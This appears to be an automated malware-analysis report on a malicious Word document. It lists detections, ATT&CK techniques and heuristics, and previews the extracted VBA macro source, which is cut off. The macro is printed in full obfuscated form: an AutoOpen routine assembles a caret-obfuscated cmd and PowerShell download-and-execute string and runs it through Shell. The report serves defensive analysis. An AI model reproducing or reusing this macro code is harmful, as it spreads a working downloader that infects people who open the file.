MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell function to execute a command, indicated by the obfuscated string 'md /V^:^O N/C'. This is a common technique for downloading and executing further malicious payloads. The specific family could not be determined due to the obfuscation and lack of clear indicators.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6702565-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6702565-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11260 bytes |
SHA-256: 65d9270661188bc46447c4d3b9e92ec6aa885ed56c642761cf333f220462e8f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IsOiMOL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim OBaRwz(1)
OBaRwz(0) = MidB("mhKtvu", 166, 59)
Dim jjpGVY(2)
jjpGVY(0) = Left("jYfKrL", 765)
jjpGVY(1) = Mid("zjczwOI", 686, 745)
MNFVUfw (KeyString(9 + 9 + 12 + 1 + 36) + kITWPHLPiG + QLpJzui + luGrwhMwj + OwitUG + bASKCSftizIf + PYnbqwFRwcaDX)
Dim EwkwLQ(2)
EwkwLQ(0) = Mid("iJEqjwuN", 374, 593)
EwkwLQ(1) = Left("ICMtjRRT", 346)
Dim lKdSa(2)
lKdSa(0) = MidB("BPukLP", 365, 589)
lKdSa(1) = MidB("waTqFlGr", 524, 874)
Dim SwEdG(1)
SwEdG(0) = MidB("TpDrkj", 217, 796)
Dim zCAcpw(1)
zCAcpw(0) = MidB("GVIYjuz", 966, 460)
End Sub
Function MNFVUfw(ZICNjmC As String)
Dim CGmLJ(2)
CGmLJ(0) = Mid("kWzql", 507, 762)
CGmLJ(1) = Mid("BzHnB", 916, 97)
Dim ifSCZ(2)
ifSCZ(0) = Right("svrbiGIR", 977)
ifSCZ(1) = MidB("JbisIwW", 402, 363)
Dim YTBEH(2)
YTBEH(0) = MidB("fJozk", 965, 941)
YTBEH(1) = MidB("jWIEWYzl", 159, 850)
Shell@ ZICNjmC, CInt(msoBarTypeNormal)
Dim CdpJdz(2)
CdpJdz(0) = Mid("XoqsCqwP", 246, 835)
CdpJdz(1) = Mid("NzYKaYEj", 280, 375)
Dim hJGNiI(2)
hJGNiI(0) = Mid("jkppoFQZ", 33, 453)
hJGNiI(1) = MidB("wrXAvmHz", 289, 640)
End Function
Attribute VB_Name = "tQSqmMzvmaCA"
Function kITWPHLPiG()
Dim bSRIz(2)
bSRIz(0) = MidB("lGduDr", 363, 970)
bSRIz(1) = MidB("mQDLi", 310, 269)
Dim NAqIu(2)
NAqIu(0) = Right("fNXzLu", 203)
NAqIu(1) = Right("ANJfi", 841)
Dim oLsjT(1)
oLsjT(0) = Right("wwABMvz", 257)
GLAVjkQiVVX = "md " + "/V" + "^" + ":^" + "O" + "N/C" + ChrW(3 + 3 + 0 + 1 + 27) + "s^" + "e^t" + " ^Op" + "^B" + "= " + "^ ^" + " ^ "
Dim ZwJiP(2)
ZwJiP(0) = MidB("mvnEM", 508, 574)
ZwJiP(1) = Left("UZlDY", 667)
YGqBqHG = "^ ^" + " ^ ^" + " " + " ^" + " ^" + " " + "^ }^"
Dim IAHKN(1)
IAHKN(0) = MidB("AKibChOf", 638, 477)
Dim JIkQlI(1)
JIkQlI(0) = Mid("qwBljzz", 250, 791)
Dim AZitB(1)
AZitB(0) = Right("FNNYsaVc", 473)
Dim RwfupM(1)
RwfupM(0) = Left("trEiKjK", 237)
ORjAbKt = "}{^" + "h" + "c" + "tac" + "^" + "};k^" + "aer" + "b" + "^"
Dim TfnwDq(1)
TfnwDq(0) = Left("AJsHR", 418)
Dim Etowus(1)
Etowus(0) = Left("bZGnRn", 115)
YAbMtmZCm = ";^h" + "^uz^" + "$ m" + "^" + "etI-" + "^" + "e" + "^" + "kovn" + "I;" + ")^"
Dim wLUmUB(2)
wLUmUB(0) = Left("UCrqR", 526)
wLUmUB(1) = Left("hoWbo", 690)
Dim lDENs(2)
lDENs(0) = MidB("ZXuHRc", 400, 194)
lDENs(1) = MidB("Gjrlis", 11, 510)
FqrcPLJBmhl = "hu^z" + "^$^ " + "^" + ",D" + "X^" + "U$(" + "^eli" + "Fd^a" + "^o" + "ln" + "wo^D" + "^.R" + "b"
Dim jLBmR(2)
jLBmR(0) = Right("VzponrOd", 949)
jLBmR(1) = MidB("jqYhvn", 178, 841)
Dim GcRiOq(2)
GcRiOq(0) = MidB("baRiG", 189, 756)
GcRiOq(1) = Mid("fwjzzoXQ", 306, 847)
Dim pdkcuP(2)
pdkcuP(0) = Mid("KzGQsbRt", 685, 140)
pdkcuP(1) = MidB("chzkMD", 835, 184)
EQGLbkA = "^" + "I${^" + "yr^" + "t" + "{)m" + "r" + "K^" + "$^ n" + "i " + "D^X"
Dim FQjll(2)
FQjll(0) = Right("oalEib", 691)
FQjll(1) = MidB("vuSklTUm", 745, 456)
idIEhDmb = "U^" + "$(" + "^hc" + "^a" + "e" + "r^o" + "^f^;" + "^" + "'^e"
kITWPHLPiG = GLAVjkQiVVX + YGqBqHG + ORjAbKt + YAbMtmZCm + FqrcPLJBmhl + EQGLbkA + idIEhDmb
Dim CLCtF(2)
CLCtF(0) = Mid("zCzTC", 563, 950)
CLCtF(1) = MidB("dZuouG", 717, 151)
Dim jAwci(2)
jAwci(0) = Left("vHZtfOl", 290)
jAwci(1) = Left("KtRaRVm", 933)
Dim LvCJW(1)
LvCJW(0) = Right("qQhID", 44)
Dim CMUBO(1)
CMUBO(0) = Right("lztqGdwj", 360)
End Function
Function QLpJzui()
Dim DOsMn(2)
DOsMn(0) = Left("DSQcWsOU", 687)
DOsMn(1) = MidB("Lmvjjvt", 945, 851)
Dim BZauki(2)
BZauki(0) = Right("CuFqMW", 974)
BZauki(1) = Left("hvGjj", 390)
OwFbiJwbWP = "^" + "xe.'" + "^" + "+i^w" + "^" + "l^$^" + "+^"
Dim BZElm(1)
BZElm(0) = MidB("aKWAWwSr", 283, 387)
Dim VjsmH(1)
VjsmH(0) = MidB("uTLzBs", 797, 636)
Dim oSocV(1)
oSocV(0) = Mid(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.